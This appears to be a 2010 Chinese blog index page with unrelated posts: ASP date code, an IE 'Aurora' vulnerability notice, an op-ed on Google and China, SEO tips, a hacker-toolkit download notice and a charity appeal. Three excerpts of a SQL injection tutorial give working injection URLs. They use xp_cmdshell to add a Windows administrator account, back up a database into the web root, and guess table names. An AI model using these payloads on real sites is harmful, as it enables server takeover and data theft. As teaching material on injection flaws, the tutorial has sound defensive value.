asp给定一个日期计算周一或周五

asp给定一个日期计算周一或周五，比如给定今天：2010-01-28

dtToday = CDate(“2010-01-28″)
下面算现在是周几
iWeekday = DatePart(“w”, dtToday, “2″)
下面算这周的周一
dtWeekDay1 = DateAdd(“d”, 1 – iWeekday, dtToday)
下面算这周的周五
dtWeekDay5 = DateAdd(“d”, 4, dtWeekDay1)
下面算下周的周一
dtNextWeekDay1 = DateAdd(“d”, 7, dtWeekDay1)
下面算下周的周五
dtNextWeekDay5 = DateAdd(“d”, 4, dtNextWeekDay1)

1月14日晚,微软发布2010年第一个IE 0day漏洞”极光”警告

微软2010年1月14日晚发布公告称，黑客在最近的针对Google、Adobe以及其他公司的攻击中利用了IE零日漏洞。远程代码执行漏洞影响到各Windows版本上运行的近乎全部的IE版本。

2010年1月14日， 微软总部发布安全公告提醒广告用户注意IE Dom 0day漏洞（极光零日漏洞
官方公告：http://www.microsoft.com/technet/security/advisory/979352.mspx
微软官方发布的IE 0Day漏洞所影响的操作系统、浏览器版本：
（1）Windows 2000 SP4下的IE6浏览器，该操作系统，目前通常被通常为学校或者企业机构使用。
（2）Windows xp/Vista/Win7 系统下的IE6/IE7/IE8浏览器，大部分普通用户使用的操作系统版本。
（3）Windows Server 2003/2008/2008r2系统下的IE6/IE7/IE8浏览器，此操作系统版本多为网站管理员使用。
漏洞解决方案和补丁：

(1)、微软官方临时补丁：http://go.microsoft.com/?linkid=9668626

(2)、360官方临时补丁：http://dl.360safe.com/360ietagpatch.exe

(3)、金山的解决方法： http://news.duba.net/contents/2010-01/19/9418.html

SQL注入漏洞之我之真见( 三)

第一节、利用系统表注入SQLServer数据库

       SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子：

① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”–

　　分号;在SQLServer中表示隔开前后两句语句，–表示后面的语句为注释，所以，这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号，接着：

② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”–

　　将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。

　　③ http://Site/url.asp?id=1 ;;and db_name()>0

前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。

④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;–
Read more

SQL注入漏洞之我之真见( 二)

第一节、SQL注入的一般步骤

首先，判断环境，寻找注入点，判断数据库类型，这在入门篇已经讲过了。

其次，根据注入参数类型，在脑海中重构SQL语句的原貌，按参数类型主要分为下面三种：

(A)  ID=1 这类注入的参数是数字型，SQL语句原貌大致如下：
Select * from 表名 where 字段=1
注入的参数为ID=1 And [查询条件]，即是生成语句：
Select * from 表名 where 字段=1 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下：
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句：
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句：
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’

接着，将查询条件替换成SQL语句，猜解表名，例如：

ID=1 And (Select Count(*) from Admin)>=0

如果页面就与ID=1的相同，说明附加条件成立，即表Admin存在，反之，即不存在（请牢记这种方法）。如此循环，直至猜到表名为止。

表名猜出来后，将Count(*)替换成Count(字段名)，用同样的原理猜解字段名。

Read more

SQL注入漏洞之我之真见(一)

引  言

随着B/S模式应用开发的发展，使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户可以提交一段数据库查询代码，根据程序返回的结果，获得某些他想得知的数据，这就是所谓的SQL Injection，即ＳＱＬ注入。

ＳＱＬ注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对ＳＱＬ注入发出警报，如果管理员没查看IIS日志的习惯，可能被入侵很长时间都不会发觉。

但是，ＳＱＬ注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

入 门 篇

 如果你以前没试过ＳＱＬ注入的话，那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则，不论服务器返回什么错误，IE都只显示为HTTP 500服务器错误，不能获得更多的提示信息。 

第一节、ＳＱＬ注入原理

以下我们从一个网站www.xxx.com开始。

在网站首页上，有名为“IE不能打开新窗口的多种解决方法”的链接，地址为：http://www.xxx.com/showdetail.asp?id=1，我们在这个地址后面加上单引号’，服务器会返回下面的错误提示：

Microsoft JET Database Engine 错误 ‘80040e14′
字符串的语法错误 在查询表达式 ‘ID=1” 中。
/showdetail.asp，行8

Read more

谷歌到底想干什么？

谷歌日前在其官方博客上宣布，考虑退出中国市场，关闭在中国运营的网站Google.cn。这一消息引起全球关注，各方都在猜测其中的原因。德国《焦点》杂志13日发表文章，认为谷歌意欲退出中国主要原因是受到中国本地公司百度的有力竞争，市场份额锐减。

日前，谷歌以搜索内容受限和受到黑客攻击为理由，宣布考虑退出中国市场。《焦点》杂志分析认为，这可能只是谷歌的借口，因为这样的情况谷歌以前也曾遇到，并不新鲜，而更深层次的原因应是基于商业考虑。

根据技术博客CNET的消息，目前谷歌在中国市场的份额只有14.1%，而本地竞争对手百度却达到了62.2%。美国科技博客网站TechCrunch也表示：“(谷歌意欲退出中国)更多的是基于商业的考虑。”

不过，谷歌发言人凯·奥博贝克否认上述说法，奥博贝克说：“上个季度，我们刚刚在中国市场取得了最好的业绩。”

谷歌是个互联网公司，名气很大，块头更大，其商业模式在世界范围内获得成功。但它现在的架势让人看不懂了。它向中国提出了政治要求，而这种事情通常是大的商业公司极力避免的。

两天来，谷歌威胁要退出中国市场，一些西方媒体发出赞扬，并迅速把这一事件变成了批判中国的好机会。美国国务卿希拉里站出来指责中国，国会议员发出更加刺耳的声音。在这一事件中，谷歌处于风暴的中心，而且它的角色明显在变。

起先，谷歌抱怨的原因是服务器受到“攻击”，后来，竟演变成要让中国取消“网络审查”。从互联网安全的一个普遍问题，跳到了要要求中国改变法律。这一跳真是让中国人吃惊。

谷歌究竟是在做商业，还是在搞政治?如果是商业，那就应当限定在商业范畴。有纠纷不要紧，可以通过商业的途径来解决，但要是想通过商业行为来影响中国政治大局和社会改革进程，那可就完全改变了事件的性质。

当前，中国互联网上的管理有一些争议，但怎么改，要充分尊重中国的现状，也要以中国社会的承受力为基本判断标准。

中国社会目前已经相当开放，互联网的成长不断激励着它，今后的中国只能更加开放。但是，任何开放都是有度的，而且开放要有一个进程，不可能一蹴而就。中国 的门该开多大，路该怎么铺，要中国人自己来设计、安排，外界怎么说，只能作为参考。一个互联网公司，即便拥有最先进的技术，最丰厚的资金，就想左右这一进 程，都是狂妄的。

谷歌在中国经营三年多，但似乎对中国的历史与现实了解的程度还很低。中国是主权国家，不是19世纪时的租界，外国企业没有治外法权。在中国经商，想游离于 中国法律之外，是对21世纪中国的误读。西方社会、跨国公司对中国建设性的批评和善意的主张，是有助于中国发展的。但如果背后隐藏政治企图，并想用一种威 胁的方式来迫使中国就范，根本行不通。

谷歌要中国取消网络审查制度，其结果只能像美国“Mashable”网站的一篇文章所说：“如果有人幻想中国会改变政策，让人无限制地接触反动、淫秽图片等内容，那纯粹是无稽之谈。”

中国这些年一直在西方某些人的鞭笞和叫骂声中成长，谷歌威胁引来更多责难没什么可怕的。倒是这一次西方媒体对谷歌威胁退出一边倒地叫好，让中国民众不能不多一层警惕之心。

英国《卫报》预测，如果谷歌摊牌，互联网世界将分裂。中国当然不希望这种分裂，但也不怕任何麻烦，更不能被这种预言所挟持。在谷歌威胁面前，中国社会必须要团结。

许多中国民众都愿意使用谷歌的搜索业务。没有谷歌在中国的业务，可能会暂时影响到一些中国人的网络生活。所以，我们欢迎谷歌留下，但留下来的谷歌必须要做 出调整，也要适应中国的法律。如果谷歌坚持要退出，没什么了不起。退出，是自绝于中国市场。(金灿荣 中国人民大学国际关系学院副院长。)

响搜索引擎优化的几大因素分析

搜索引擎是以用户体验为中心的，影响搜索引擎的因素其实就是影响客户浏览的因素，所以我们要从客户的浏览习惯并从技术层面增加适合搜索引擎索引的因素，但也要控制好度，这个度没有统一的标准，只能靠多调查多实验多分析：

一、堆砌关键词

为了提高关键词密度而在网页中过份堆砌关键词，这种靠提高网页针对关键词的相关度已经不太适用现在的搜索引擎。随着搜索引擎算法的改进，关键词密度已经不是一个重要的因素，操作不当有可能还会被处罚。

二、大量的网站内容均为复制

只有网站结构附合SEO标准，但内容均为复制，自己原创内容极少。这样搜索引擎在辨认来源会是一个很大的问题。一旦搜索引擎得到确认，那么整个网站在搜索引擎中的排名会受到相当大的影响。而且还会涉及到版权问题。

三、网站链接到被惩罚的网站

要时刻注意和你互连的网站是否被惩罚，链接到被惩罚的网站有可能遭受到连带的惩罚。简单来看，从它的Site:域名和pagerank是否为0可以 很容易看出来。但为了避免不必要的风险，选择外部连结的网站是很重要的。那些自动交换链接，大规模交换链接很容易出问题，人工有选择性的交换始终是一个稳 固妥当的办法。

四、SPAM 导入链接

通过程序自动发布本身网站连结到部博客或者BBS，或者通过程序大量创建毫无意义的博客，如此可以迅速获得大量的外部连结。此种做法被普遍认为可以让搜索引擎快速收录并提升搜索引擎排名，且搜索引擎没有办法确认此为有效连接。但只要被抓到一次，你的网站很可能就从此消失。

红客联盟工具包2010抢先版

经过N天的打包和上传终于完成了红盟工具包2010抢先版，于1月12日发布，本版本增加了防和学，防里增加了数据备份和增强和防火墙等，学里增加了论坛精品资料。

打包工具用的setup factory 7.01汉化版，面版用的音速启(vstart)。

下载地址：http://forum.chinesehonker.org/thread-7956-1-1.html

安装说明：http://forum.chinesehonker.org/thread-8257-1-1.html

看了心痛的小女孩：拯救怡帆：帮助一名Linux程序员的女儿

在北京工作的潘俊廷是一位在嵌入式领域尤其是ARM/Linux方面从事开发工作多年的工程师，我们的同行。他也是Linux社区活跃分子，担任Linux论坛版主。他的妻子是一位平面设计师。他们和我们许多人一样，从外地来到大城市寻找梦想，结婚，生子。

他的女儿潘怡帆今年5岁。出生第二天就进了急救病房。后诊断为肺动脉高压，一直靠氧气机呼吸。目前她的肺部已经转纤维化，不能提供自己所需的氧气， 生命垂危。她的父母为了挽救女儿的生命，已经倾其所有，卖掉了房子。国内专家已经无能为力，需要转美国治疗此病经验丰富的德州儿童医院进行心肺移植手术。 所需资金约50万美元。

请大家一起帮助她，程序员的下一代。因为病魔的折磨，她还没有学会走路，她的记忆里更多的只是针头和面罩，她更多的是从电视里知道了世界，她还保存着给四川灾区捐款一万元而收到的感谢信。

【捐款方式】

请访问怡帆基金网站捐赠页面 http://www.help-yifan.org/donate.html

更多详情请访问 http://www.help-yifan.org

【更新】记者今日连线小怡帆的父亲潘俊廷，就一些具体情况进行了解。以下整理自潘俊廷的回复。

1、对于捐款网站不稳定的情况。潘俊廷表示网站是由志愿者帮忙架设在一个国外服务器的。当流量太大时就会显得不稳定。志愿者正在做分流的工作。（右侧精彩评论区有志愿者的回复。）

2. 有读者质疑:接收汇款的地点在立方庭，目前房价约3w/平米，如果这房子是他们自己所有的话，卖房款相当可观。而且立方庭刚在卖的时候大约2w/平米既然都能买得起，为什么还需要基金会和募捐来的区区40w左右呢?

潘俊廷回复这是他和朋友租的办公室，现在他们一家三口暂住在单位。如果不是得到美国医生的帮助，他们一家是不会向社会求助来争取给孩子这个机会。实 际上，自对外发布求助以来，他们听到了各个方面质疑的声音，他们了解质疑也是基于关心怡帆的初衷发出的，但解释只能使质疑更多，现在对于所有的质疑，他们 只有一个简单的回答：她是我们的孩子！

3.对于许多人关注的小怡帆近况，记者了解到：由于最近降温，气压比较低，小怡帆咳得更厉害了。在评论中一些读者建议试试中医治疗，潘俊廷表示，中医之前已尝试了两年，一开始有一些效果，后来就没有更多的进展。

CSDN:http://news.csdn.net/a/20100106/216271.html
JAVAEYE:http://www.javaeye.com/news/12795-help-yi-fan

我相信大家都不希望这个漂亮的小女孩会离我们而去，做为IT人，我想和大家一起去努力挽救这个幼小的生命。

单独一人是妙小的，不过我坚信，我们团结起来一定会很伟大。

在这里我祝福怡帆，生命之路还很长，希望她能坚持。